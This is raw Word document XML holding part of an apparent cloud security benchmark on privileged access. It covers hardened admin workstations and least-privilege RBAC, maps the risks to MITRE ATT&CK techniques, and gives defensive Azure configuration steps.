        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Attackers target exposed RDP/SSH endpoints or unsecured protocols to intercept admin sessions or perform brute force attacks, gaining access to cloud resources. Direct connections over public IPs risk session hijacking or credential stuffing, allowing adversaries to execute unauthorized commands or extract data from virtual machines or databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D52F49" w14:textId="1322256C" w:rsidR="006E0D6E" w:rsidRPr="00E53977" w:rsidRDefault="006E0D6E" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Insider threats from misused privileged access on non-PAW devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3888D04D" w14:textId="5688A086" w:rsidR="006E0D6E" w:rsidRPr="00E53977" w:rsidRDefault="006E0D6E" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Authorized admins misuse standing privileged access or bypass controls by using personal devices, risking credential exposure to malware or policy </w:t>
      </w:r>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Malware propagation and persistence on administrative workstations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6F25DD" w14:textId="050B7E19" w:rsidR="006E0D6E" w:rsidRPr="00E53977" w:rsidRDefault="006E0D6E" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="144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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Lack of auditability and traceability for privileged workstation activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C014868" w14:textId="6CEA08E8" w:rsidR="006E0D6E" w:rsidRPr="00E53977" w:rsidRDefault="006E0D6E" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="144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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5F1D34" w14:textId="635526E0" w:rsidR="006E0D6E" w:rsidRDefault="006E0D6E" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Credential Access (TA0006)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC52703" w14:textId="37819041" w:rsidR="00A51919" w:rsidRDefault="00A51919" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="374"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00A51919">
        <w:t>Stealing credentials (e.g., passwords, API tokens) from unhardened administrative workstations via keyloggers, phishing, or memory-scraping malware (T1552.001), using captured credentials to authenticate to cloud management consoles or APIs for unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189E9E66" w14:textId="47A5F49C" w:rsidR="006E0D6E" w:rsidRDefault="006E0D6E" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Privilege Escalation (TA0004)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54224DDC" w14:textId="1B9AFBC6" w:rsidR="00A51919" w:rsidRPr="00E53977" w:rsidRDefault="00A51919" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="374"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00A51919">
        <w:t>Exploiting local admin rights or unpatched vulnerabilities on non-PAW devices to escalate privileges (T1068), manipulating IAM roles or access tokens to gain tenant-wide administrative access, such as modifying cloud resource policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C06AA1" w14:textId="5DC6766A" w:rsidR="006E0D6E" w:rsidRDefault="006E0D6E" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8ACFB5" w14:textId="74E9F2A7" w:rsidR="00A51919" w:rsidRPr="00E53977" w:rsidRDefault="00A51919" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="374"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00A51919">
        <w:t>Targeting exposed RDP/SSH endpoints on cloud resources via brute force or session interception (T1133), using compromised admin sessions from unsecured remote connections to execute commands or access sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215CFF25" w14:textId="05979127" w:rsidR="006E0D6E" w:rsidRDefault="006E0D6E" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Persistence (TA0003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FAC19A" w14:textId="731E5D9B" w:rsidR="00A51919" w:rsidRPr="00E53977" w:rsidRDefault="00A51919" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="374"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00A51919">
        <w:t>Establishing persistent access by deploying malware or backdoors on unhardened workstations (T1547.001), maintaining control over admin devices to repeatedly access cloud IAM configurations or deploy malicious workloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FEC140" w14:textId="53C68F53" w:rsidR="006E0D6E" w:rsidRDefault="006E0D6E" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFDBB45" w14:textId="0118BF49" w:rsidR="00A51919" w:rsidRPr="00E53977" w:rsidRDefault="00A51919" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="374"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00A51919">
        <w:lastRenderedPageBreak/>
        <w:t>Disabling cloud logging or monitoring services via compromised admin accounts on non-PAW devices (T1562.008), concealing unauthorized IAM changes or resource manipulations by suppressing audit trails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E617C2" w14:textId="42697799" w:rsidR="006E0D6E" w:rsidRPr="00E53977" w:rsidRDefault="006E0D6E" w:rsidP="006E0D6E">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>PA-6.1: Use privileged access solution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CB5559" w14:textId="692400C9" w:rsidR="006E0D6E" w:rsidRPr="00E53977" w:rsidRDefault="006E0D6E" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="108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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Provision and configure hardened PAW devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A9E9D0" w14:textId="0434433A" w:rsidR="006E0D6E" w:rsidRPr="00E53977" w:rsidRDefault="006E0D6E" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Deploy dedicated Windows devices as PAWs (physical workstations or Azure VMs) enrolling them in Microsoft Intune for centralized management, applying Microsoft Defender for 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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Implement device compliance and application control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2993E896" w14:textId="301FCA64" w:rsidR="006E0D6E" w:rsidRPr="00E53977" w:rsidRDefault="006E0D6E" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>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and consumer cloud services through Microsoft Defender for Cloud Apps integration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05566E6F" w14:textId="6D373F83" w:rsidR="006E0D6E" w:rsidRPr="00E53977" w:rsidRDefault="006E0D6E" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Enable threat detection and monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB6D139" w14:textId="4532D56F" w:rsidR="006E0D6E" w:rsidRPr="00E53977" w:rsidRDefault="006E0D6E" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="108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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Enforce identity and access controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFF10F7" w14:textId="6B7666DE" w:rsidR="006E0D6E" w:rsidRPr="00E53977" w:rsidRDefault="006E0D6E" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="108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Entra Privileged Identity Management (PIM) for just-in-time role activation requiring </w:t>
      </w:r>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>approval and justification before granting time-bound administrative permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2122E93E" w14:textId="132395A9" w:rsidR="006E0D6E" w:rsidRPr="00E53977" w:rsidRDefault="006E0D6E" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Deploy secure remote access for cloud resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A4BBB7" w14:textId="0A9580EF" w:rsidR="006E0D6E" w:rsidRPr="00E53977" w:rsidRDefault="006E0D6E" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Provision Azure Bastion as fully platform-managed PaaS service in virtual networks enabling RDP/SSH connectivity to Azure VMs directly through Azure portal via web browser without public IP exposure, storing SSH private keys as secrets in Azure Key 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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Establish PAW usage policies and training</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1E1403" w14:textId="755BAA72" w:rsidR="00997288" w:rsidRPr="00E53977" w:rsidRDefault="00997288" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="108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3" w:name="_Toc242449496"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>PA-7: Follow just enough administration (least privilege) principle</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="7A0C123B" w14:textId="0996BB16" w:rsidR="00997288" w:rsidRPr="00E53977" w:rsidRDefault="00997288" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E2FDC8" w14:textId="63516E07" w:rsidR="00997288" w:rsidRPr="00E53977" w:rsidRDefault="00997288" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="108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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="078E46B4" w14:textId="42A85507" w:rsidR="00997288" w:rsidRPr="00E53977" w:rsidRDefault="00997288" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Unauthorized access due to excessive permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3E383D" w14:textId="3C186B6B" w:rsidR="00997288" w:rsidRPr="00E53977" w:rsidRDefault="00997288" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">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subscription scope), allowing adversaries to perform actions like data exfiltration, resource deletion, or IAM policy modification. For instance, a user with unnecessary </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>write</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> access to a storage account can extract confidential data or deploy malicious content, amplifying the attack surface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD5DADA" w14:textId="301687C9" w:rsidR="00997288" w:rsidRPr="00E53977" w:rsidRDefault="00997288" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Privilege escalation from misconfigured role assignments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5865BF56" w14:textId="13AE2BF9" w:rsidR="00997288" w:rsidRPr="00E53977" w:rsidRDefault="00997288" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>Adversaries leverage misconfigured or overly permissive role assignments to escalate privileges, gaining unauthorized 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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Insider threats from unrestricted access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C469856" w14:textId="61ABD594" w:rsidR="00997288" w:rsidRPr="00E53977" w:rsidRDefault="00997288" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Authorized users, intentionally or unintentionally, misuse broad access privileges to perform unauthorized actions, such as modifying critical resources or accessing sensitive data. In cloud platforms, an insider with a role granting excessive </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>permissions</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">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24F5673C" w14:textId="0CBC75B3" w:rsidR="00997288" w:rsidRPr="00E53977" w:rsidRDefault="00997288" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Lateral movement across cloud resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C73E36F" w14:textId="3360EC59" w:rsidR="00997288" w:rsidRPr="00E53977" w:rsidRDefault="00997288" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="144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rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6F70C8" w14:textId="19CB01F8" w:rsidR="00C63047" w:rsidRDefault="00C63047" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CDD31E" w14:textId="720845DD" w:rsidR="00A51919" w:rsidRPr="00E53977" w:rsidRDefault="00A51919" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="375"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00A51919">
        <w:t>Valid Accounts: Cloud Accounts (T1078.004): Compromising over-privileged accounts with broad RBAC roles (e.g., Owner at subscription scope) to authenticate to cloud management consoles or APIs, enabling adversaries to access sensitive resources like storage accounts or virtual machines without detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC736AF" w14:textId="4FBB6989" w:rsidR="00C63047" w:rsidRDefault="00C63047" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Privilege Escalation (TA0004)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6365FA9C" w14:textId="44E3B5BF" w:rsidR="00A51919" w:rsidRPr="00E53977" w:rsidRDefault="00A51919" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="375"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00A51919">
        <w:t xml:space="preserve">Abuse Elevation Control Mechanism: Cloud Infrastructure (T1548.005): Exploiting misconfigured RBAC roles with excessive permissions to escalate privileges, such as modifying IAM policies to assign tenant-wide </w:t>
      </w:r>
      <w:r w:rsidRPr="00A51919">
        <w:lastRenderedPageBreak/>
        <w:t>administrative roles from a resource group scope, granting unauthorized control over cloud resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B5A804" w14:textId="5A886263" w:rsidR="00C63047" w:rsidRDefault="00C63047" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Persistence (TA0003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5E1457" w14:textId="5F6B6CA0" w:rsidR="00A51919" w:rsidRPr="00E53977" w:rsidRDefault="00A51919" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="375"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00A51919">
        <w:t>Account Manipulation: Additional Cloud Roles (T1098.001): Modifying RBAC role assignments to add persistent high-privilege roles to compromised accounts, allowing adversaries to maintain access to cloud resources like databases or compute instances via unauthorized role bindings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67064A75" w14:textId="0C371DBC" w:rsidR="00C63047" w:rsidRDefault="00C63047" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Exfiltration (TA0010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A722A7" w14:textId="198D7C44" w:rsidR="00A51919" w:rsidRPr="00E53977" w:rsidRDefault="00A51919" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="375"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00A51919">
        <w:t xml:space="preserve">Data from Cloud Storage (T1530): Accessing and extracting sensitive data from cloud storage using accounts with overly permissive RBAC roles, enabling adversaries to enumerate and download confidential files from storage buckets due to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A51919">
        <w:t>unscoped</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A51919">
        <w:t xml:space="preserve"> permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D74AF2" w14:textId="12C9C1D6" w:rsidR="00C63047" w:rsidRDefault="00C63047" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD4BEDC" w14:textId="59B1E2F0" w:rsidR="00A51919" w:rsidRPr="00E53977" w:rsidRDefault="00A51919" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="375"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00A51919">
        <w:t>Impair Defenses: Disable or Modify Cloud Logs (T1562.008): Using accounts with excessive RBAC permissions to disable audit logging or monitoring services, concealing malicious actions like resource modifications or IAM changes by suppressing cloud-native audit trails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB5F43C" w14:textId="4934AB39" w:rsidR="00C63047" w:rsidRPr="00E53977" w:rsidRDefault="00C63047" w:rsidP="00C63047">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>PA-7.1: Use Azure RBAC to manage Azure resource access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB76AC7" w14:textId="508C6931" w:rsidR="00C63047" w:rsidRPr="00E53977" w:rsidRDefault="00C63047" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Use Azure role-based access control (Azure RBAC) to manage Azure resource access through role assignment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F308AA3" w14:textId="417ED7C5" w:rsidR="00C63047" w:rsidRPr="00E53977" w:rsidRDefault="00C63047" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">The privileges you assign to resources through Azure RBAC should always be limited to what's required by the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>roles</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>.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4" w:name="_Toc242449497"/>
